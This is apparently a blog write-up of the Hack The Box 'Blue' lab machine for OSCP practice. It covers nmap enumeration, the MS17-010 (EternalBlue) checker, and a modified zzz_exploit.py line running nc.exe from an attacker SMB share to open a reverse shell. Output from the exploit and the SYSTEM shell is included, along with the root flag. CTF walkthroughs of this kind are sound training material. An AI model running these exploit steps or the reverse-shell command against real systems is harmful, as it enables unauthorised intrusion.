viernes, 5 de noviembre de 2021

HTB - BLUE

HACK THE BOX - Training for OSCP

10.10.10.40

Windows 


ENUMERATION PHASE

As usual let's start with a TCP port scan on all the open 65535 TCP ports, at the same time let's run some basic enumeration scripts, we don't want (-n) name resolution and finally we will save the output in nmap format

alter@kali:~/htb-vip/prep_oscp/blue$ nmap -p- --open -T5 -sC -sV -n 10.10.10.40 -oN blue.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-05 12:11 CET
Connect Scan Timing: About 11.75% done; ETC: 12:13 (0:01:15 remaining)
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.14% done; ETC: 12:13 (0:01:12 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.12s latency).
Not shown: 57067 closed ports, 8460 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7m49s, deviation: 2s, median: 7m48s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-11-05T11:21:37+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-05T11:21:34
|_  start_date: 2021-11-05T11:17:45


So, we have samba service running on a very old Windows 7 OS, so I believe here there is a ethernalblue, we can verify the vulnerablity with nmap


alter@kali:~/htb-vip/prep_oscp/blue$  nmap --script "smb-vuln*" -p139,445 10.10.10.40 -oN smb.nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-05 12:16 CET

Nmap scan report for 10.10.10.40

Host is up (0.13s latency).

PORT    STATE SERVICE

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds

Host script results:

|_smb-vuln-ms10-054: false

|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

| smb-vuln-ms17-010: 

|   VULNERABLE:

|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2017-0143

|     Risk factor: HIGH

|       A critical remote code execution vulnerability exists in Microsoft SMBv1

|        servers (ms17-010).


So as we can see the machine is vulnerable


FOOTHOLD PHASE

We cat use https://github.com/worawit/MS17-010 in order to double check and exploit ethernalblue

The project provides a script called checker.py which allows us to check if the samba server is vulnerable and checking if there is any available pipe


root@kali:/home/alter/oscp/smb/exploits/MS17-010# python2.7 checker.py

checker.py <ip>

root@kali:/home/alter/oscp/smb/exploits/MS17-010# python2.7 checker.py 10.10.10.40

Target OS: Windows 7 Professional 7601 Service Pack 1

The target is not patched

=== Testing named pipes ===

spoolss: STATUS_ACCESS_DENIED

samr: STATUS_ACCESS_DENIED

netlogon: STATUS_ACCESS_DENIED

lsarpc: STATUS_ACCESS_DENIED

browser: STATUS_ACCESS_DENIED


It did not work, sometimes we need to provide a username to the checker script

We edit checker.py and we add GUEST as a username

'''

Script for

- check target if MS17-010 is patched or not.

- find accessible named pipe

'''

USERNAME = 'GUEST'

PASSWORD = ''


Let's try again


root@kali:/home/alter/oscp/smb/exploits/MS17-010# python2.7 checker.py 10.10.10.40

Target OS: Windows 7 Professional 7601 Service Pack 1

The target is not patched

=== Testing named pipes ===

spoolss: STATUS_OBJECT_NAME_NOT_FOUND

samr: Ok (64 bit)

netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))

lsarpc: Ok (64 bit)

browser: Ok (64 bit)


And now worked, we have some available pipes.


EXPLOTATION PHASE

In order to exploit the vulnerablity we can use the zzz_exploit.py script which requires the IP and a pipe_name


python zzz_exploit.py

zzz_exploit.py <ip> [pipe_name]


We can edit zzz_exploit.py  and add next line in order to get a reverse shell


#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')

        #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')

        service_exec(conn, r'cmd /c \\10.10.14.18\a\nc.exe -e cmd 10.10.14.11 443')

        # Note: there are many methods to get shell over SMB admin session

        

The victim is going to connect back to our shared resource “a” running in my Kaly, so the victim will be able to access to nc.exe and execute a reverse shell on port 443


Let's run our smbserver to share nc.exe

root@kali:/home/alter/oscp/escalar/windows/tools# python2.7 smbserver a .

python2.7: can't open file 'smbserver': [Errno 2] No such file or directory

root@kali:/home/alter/oscp/escalar/windows/tools# smbserver.py a .

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation



Then we run the zzz_script providing the IP address and the pipe

root@kali:/home/alter/oscp/smb/exploits/MS17-010# python2.7 zzz_exploit.py 10.10.10.40 samr

Target OS: Windows 7 Professional 7601 Service Pack 1

Target is 64 bit

Got frag size: 0x10

GROOM_POOL_SIZE: 0x5030

BRIDE_TRANS_SIZE: 0xfa0

CONNECTION: 0xfffffa8001d00360

SESSION: 0xfffff8a001aea060

FLINK: 0xfffff8a009239088

InParam: 0xfffff8a00923315c

MID: 0x2d03

success controlling groom transaction

modify trans1 struct for arbitrary read/write

make this SMB session to be SYSTEM

overwriting session security context

creating file c:\pwned.txt on the target

Opening SVCManager on 10.10.10.40.....

Creating service MAWE.....

Starting service MAWE.....

The NETBIOS connection with the remote host timed out.

Removing service MAWE.....

ServiceExec Error on: 10.10.10.40

nca_s_proto_error

Done


We had our listener ready to get the reverse shell:

alter@kali:~/htb-vip/prep_oscp/blue$ sudo rlwrap nc -nlvp 443

[sudo] password for alter: 

listening on [any] 443 ...

connect to [10.10.14.18] from (UNKNOWN) [10.10.10.40] 49159

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


C:\Windows\system32>whoami

whoami

nt authority\system

C:\Windows\system32>

C:\Users\Administrator\Desktop>type root.txt

type root.txt

ff548eb71e920ff6c08843ce9df4e717

C:\Users\Administrator\Desktop>




Publicado por en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)